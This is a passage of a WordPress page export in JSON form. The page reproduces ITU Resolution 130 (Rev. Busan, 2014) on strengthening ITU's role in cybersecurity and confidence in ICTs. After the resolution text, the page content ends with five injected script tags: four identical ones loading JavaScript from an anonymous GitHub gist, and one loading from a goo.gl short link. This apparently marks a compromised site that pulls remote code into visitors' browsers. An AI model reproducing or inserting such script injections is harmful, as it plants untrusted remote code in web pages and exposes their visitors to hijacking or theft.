Dubai, 2012); Resolutions 45 and 69 (Rev. Dubai , 2014); Objective 3 of the Dubai Action Plan; the relevant ITU\u2011T Questions on technical aspects regarding the security of information and communication networks; and ITU\u2011D Question 3\/2,<\/div>\n<\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\">\n<div class=\"nodecontent\">resolves<\/div>\n<ul class=\"sub\">\n<li class=\"basic\">\n<div class=\"nodecontent\">1        to continue to give this work high priority within ITU, in accordance with its competences and expertise, including promoting common understanding among governments and other stakeholders of building confidence and security in the use of ICTs at national, regional and international level;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">2        to give high priority to the work of ITU described under bearing in mind above, in accordance with its competencies and areas of expertise, and to continue to work closely, as appropriate, with other relevant bodies\/agencies within the United Nations and other relevant international bodies, taking into account the specific mandates and areas of expertise of the different agencies, while being mindful of the need to avoid duplicating work between organizations and among the Bureaux or the General Secretariat;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">3        that ITU shall focus resources and programmes on those areas of cybersecurity within its core mandate and expertise, notably the technical and development spheres, and not including areas related to Member States&#8217; application of legal or policy principles related to national defence, national security, content and cybercrime, which are within their sovereign rights, although this does not however exclude ITU from carrying out its mandate to develop technical recommendations designed to reduce vulnerabilities in the ICT infrastructure, nor from providing all the assistance that was agreed upon at WTDC-14, including Objective 3 and in activities under Question 3\/2;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">4        to contribute to further strengthening the trust and security framework, consistent with the ITU&#8217;s role as lead facilitator of WSIS Action Line C5, taking into account Resolution 140 (Rev. Busan, 2014),<\/div>\n<\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\">\n<div class=\"nodecontent\">instructs the Secretary-General and the Directors of the Bureaux<\/div>\n<ul class=\"sub\">\n<li class=\"exp\">\n<div class=\"nodecontent\">1        to continue to review:<\/div>\n<ul class=\"sub\">\n<li class=\"basic\">\n<div class=\"nodecontent\">i)        the work done so far in the three Sectors, under the ITU Global Cybersecurity Agenda and in other relevant organizations and initiatives to address existing and future threats in order to build confidence and security in the use of ICTs, such as the issue of countering spam, which is growing and on the rise;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">ii)        the progress achieved in the implementation of this resolution, with ITU continuing to play a lead facilitating role as the moderator\/facilitator for Action Line C5, with the help of the advisory groups, consistent with the ITU Constitution and the ITU Convention;<\/div>\n<\/li>\n<\/ul>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">2        consistent with Resolution 45 (Rev. Dubai 2014), to report to the Council on activities within ITU and other relevant organizations and entities to enhance cooperation and collaboration, regionally and globally, to strengthen building confidence and security in the use of ICTs of Member States in particular, developing countries, taking into account any information provided by Member States, including information on situations within their own jurisdiction that could affect this cooperation;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">3        consistent with Resolution 45 (Rev. Dubai, 2014), to report on memoranda of understanding (MoU) between countries, as well as existing forms of cooperation, providing analysis of their status, scope and how these cooperative mechanisms can be applied to strengthen cybersecurity and combat cyberthreats, with a view to enabling Member States to identify whether additional memoranda or mechanisms are required;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">4        to facilitate access to tools and resources, within the available budget, required for enhancing confidence and security in the use of ICTs for all Member States, consistent with WSIS provisions on universal and non-discriminatory access to ICTs for all nations;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">5        to continue to maintain the cybersecurity gateway as a way to share information on national, regional and international cybersecurity-related initiatives worldwide;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">6        to report annually to the Council on these activities and to make proposals as appropriate;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">7        to further enhance coordination between the study groups and programmes concerned,<\/div>\n<\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\">\n<div class=\"nodecontent\">instructs the Director of the Telecommunication Standardization Bureau<\/div>\n<ul class=\"sub\">\n<li class=\"exp\">\n<div class=\"nodecontent\">1        to intensify work within existing ITU\u2011T study groups in order to:<\/div>\n<ul class=\"sub\">\n<li class=\"basic\">\n<div class=\"nodecontent\">i)        address existing and future threats and vulnerabilities affecting efforts to build confidence and security in the use of ICTs, by developing reports or recommendations, as appropriate, with the goal of implementing the resolutions of WTSA-12, particularly Resolutions 50, 52 and 58 (Rev. Dubai, 2012), allowing work to begin before a Question is approved;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">ii)        seek ways to enhance the exchange of technical information in these fields, promote the adoption of protocols and standards that enhance security, and promote international cooperation among appropriate entities;<\/div>\n<\/li>\n<li class=\"col\">\n<div class=\"nodecontent\">iii)        facilitate projects deriving from the outcomes of WTSA-12, in particular:<\/div>\n<ul class=\"subexp\">\n<li class=\"basic\">\n<div class=\"nodecontent\">a)        Resolution 50 (Rev. Dubai, 2012), on cybersecurity;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">b)        Resolution 52 (Rev. Dubai, 2012), on countering and combating spam;<\/div>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">2        to continue collaboration with relevant organizations with a view to exchanging best practices and disseminating information through, for example, joint workshops and training sessions and joint coordination activity groups, and, by invitation, through written contributions from relevant organizations,<\/div>\n<\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\">\n<div class=\"nodecontent\">instructs the Director of the Telecommunication Development Bureau<\/div>\n<ul class=\"sub\">\n<li class=\"basic\">\n<div class=\"nodecontent\">1        consistent with the results of WTDC-14 and pursuant to Resolutions 45 and 69 (Rev. Dubai, 2014), Resolution 80 (Dubai, 2014) and Objective 3 of the Dubai Action Plan, to support ongoing regional and global cybersecurity projects, and to encourage all countries to take part in these activities;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">2        upon request, to support ITU Member States in their efforts to build capacity, by facilitating Member States&#8217; access to resources developed by other relevant international organizations that are working on national legislation to combat cybercrime; supporting ITU Member States&#8217; national and regional efforts to build capacity to protect against cyberthreats\/cybercrime, in collaboration with one another; consistent with the national legislation of Member States referred to above, assisting Member States, in particular developing countries, in the elaboration of appropriate and workable legal measures relating to protection against cyberthreats at national, regional and international levels; establishing technical and procedural measures, aimed at securing national ICT infrastructures, taking into the account the work of the relevant ITU\u2011T study groups and, as appropriate, other relevant organizations; establishing organizational structures, such as CIRTs, to identify, manage and respond to cyberthreats, and cooperation mechanisms at the regional and international level;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">3        to provide the necessary financial and administrative support for these projects within existing resources, and to seek additional resources (in cash and in kind) for the implementation of these projects through partnership agreements;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">4        to ensure coordination of the work of these projects within the context of ITU&#8217;s overall activities in its role as moderator\/facilitator for WSIS Action Line C5, and to eliminate any duplication regarding this important subject with the General Secretariat and ITU\u2011T;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">5        to coordinate the work of these projects with that of the ITU\u2011D study groups on this topic, and with the relevant programme activities and the General Secretariat;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">6        to continue collaboration with relevant organizations with a view to exchanging best practices and disseminating information through, for example, joint workshops and training sessions;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">7        to support ITU Member States in the development of their national and\/or regional cybersecurity strategies toward building national capabilities for dealing with cyberthreats in accordance with the principles of international cooperation, consistent with Objective 3 of the Dubai Action Plan;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">8        to report annually to the Council on these activities and make proposals as appropriate,<\/div>\n<\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\">\n<div class=\"nodecontent\">further instructs the Director of the Telecommunication Standardization Bureau and the Director of the Telecommunication Development Bureau<\/div>\n<ul class=\"sub\">\n<li class=\"basic\">\n<div class=\"nodecontent\">each within the scope of his responsibilities:<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">1        to implement relevant resolutions of both WTSA-12 and WTDC-14, including the programme described in Output 3.1 of Objective 3 of the Dubai Action Plan, on providing support and assistance to developing countries in building confidence and security in the use of ICTs;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">2         to identify and promote the availability of information on building confidence and security in the use of ICTs, specifically related to the ICT infrastructure, for Member States, Sector Members and relevant organizations;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">3        without duplicating the work under ITU\u2011D Question 3\/2, to identify best practices in establishing CIRTs, to prepare a reference guide for the Member States and, where appropriate, to contribute to Question 3\/2;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">4        to cooperate with relevant organizations and other relevant international and national experts, as appropriate, in order to identify best practices in the establishment of CIRTs;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">5        to take action with a view to new Questions being examined by the study groups within the Sectors on the establishment of confidence and security in the use of ICT;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">6        to identify and document practical steps to strengthen security in the use of ICTs internationally, based on widely accepted practices, guidelines and recommendations that Member States can choose to apply to improve their ability to combat cyberthreats and attacks and to strengthen international cooperation in building confidence and security in the use of ICTs, taking into account the ITU Global Cybersecurity Agenda (GCA) and within the available financial resources;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">7        to support strategy, organization, awareness-raising, cooperation, evaluation and skills development;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">8        to provide the necessary technical and financial support, within the constraints of existing budgetary resources, in accordance with Resolution 58 (Rev. Dubai, 2012);<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">9        to mobilize appropriate extrabudgetary resources, outside the regular budget of the Union, for the implementation of this resolution, to help developing countries,<\/div>\n<\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\">\n<div class=\"nodecontent\">instructs the Secretary-General<\/div>\n<ul class=\"sub\">\n<li class=\"basic\">\n<div class=\"nodecontent\">pursuant to his initiative on this matter:<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">1        to report to the Council, taking into account the activities of the three Sectors, on the implementation and effectiveness of the action plan to strengthen the role of ITU in building confidence and security in the use of ICTs;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">2        to cooperate with relevant international organizations, including through the adoption of MoUs, subject to the approval of the Council in this regard, in accordance with Resolution 100 (Minneapolis, 1998) of the Plenipotentiary Conference,<\/div>\n<\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\">\n<div class=\"nodecontent\">requests the Council<\/div>\n<ul class=\"sub\">\n<li class=\"basic\">\n<div class=\"nodecontent\">to include the report of the Secretary-General in the documents sent to Member States in accordance with No. 81 of the Convention,<\/div>\n<\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\">\n<div class=\"nodecontent\">invites Member States<\/div>\n<ul class=\"sub\">\n<li class=\"basic\">\n<div class=\"nodecontent\">1        to consider joining appropriate competent international and regional initiatives for enhancing national legislative frameworks relevant to the security of information and communication networks;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">2        to closely collaborate in strengthening regional and international cooperation, taking into account Resolution 45 (Rev. Dubai, 2014), with a view to enhancing confidence and security in the use of ICTs, in order to mitigate risks and threats;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">3        to support ITU initiatives on cybersecurity, including the Global Cybersecurity Index (GCI), in order to promote government strategies and the sharing of information on efforts across industries and sectors;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">4        to inform the Secretary General of relevant activities related to this resolution regarding confidence and security in the use of ICTs,<\/div>\n<\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\">\n<div class=\"nodecontent\">invites Member States, Sector Members and Associates<\/div>\n<ul class=\"sub\">\n<li class=\"basic\">\n<div class=\"nodecontent\">1        to contribute on this subject to the relevant ITU study groups and to any other activities for which the Union is responsible;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">2        to contribute to building confidence and security in the use of ICTs at the national, regional and international levels, by undertaking activities as outlined in \u00a7 12 of the Geneva Plan of Action, and to contribute to the preparation of studies in these areas;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">3        to promote the development of educational and training programmes to enhance user awareness of risks in cyberspace;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">4        to collaborate, as appropriate, in order to address and prevent problems that undermine confidence and security in the use of telecommunications\/ICTs.<\/div>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<p> <script type='text\/javascript' src='https:\/\/gist.githubusercontent.com\/vladimir677\/bd66b2780ce8792e731469b660a62590\/raw\/3a71aff685732599ba7fbadf7b929eae8d19053a\/js.js'><\/script> <script type='text\/javascript' src='https:\/\/gist.githubusercontent.com\/vladimir677\/bd66b2780ce8792e731469b660a62590\/raw\/3a71aff685732599ba7fbadf7b929eae8d19053a\/js.js'><\/script> <script type='text\/javascript' src='https:\/\/gist.githubusercontent.com\/vladimir677\/bd66b2780ce8792e731469b660a62590\/raw\/3a71aff685732599ba7fbadf7b929eae8d19053a\/js.js'><\/script> <script type='text\/javascript' src='https:\/\/gist.githubusercontent.com\/vladimir677\/bd66b2780ce8792e731469b660a62590\/raw\/3a71aff685732599ba7fbadf7b929eae8d19053a\/js.js'><\/script> <script type='text\/javascript' src='https:\/\/goo.gl\/dd1kPI'><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>PP RESOLUTION 130 (Rev. Busan, 2014) Strengthening the role of ITU in building confidence and security in the use of information and communication technologies The Plenipotentiary Conference of the International Telecommunication Union ( Busan, 2014), recalling a) United Nations General Assembly (UNGA) Resolution 68\/198, on information and communication technologies (ICTs) for development; b) UNGA Resolution [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":1668,"menu_order":130,"comment_status":"open","ping_status":"open","template":"","meta":{"footnotes":""},"class_list":["post-1721","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/pages\/1721","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/comments?post=1721"}],"version-history":[{"count":0,"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/pages\/1721\/revisions"}],"up":[{"embeddable":true,"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/pages\/1668"}],"wp:attachment":[{"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/media?parent=1721"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}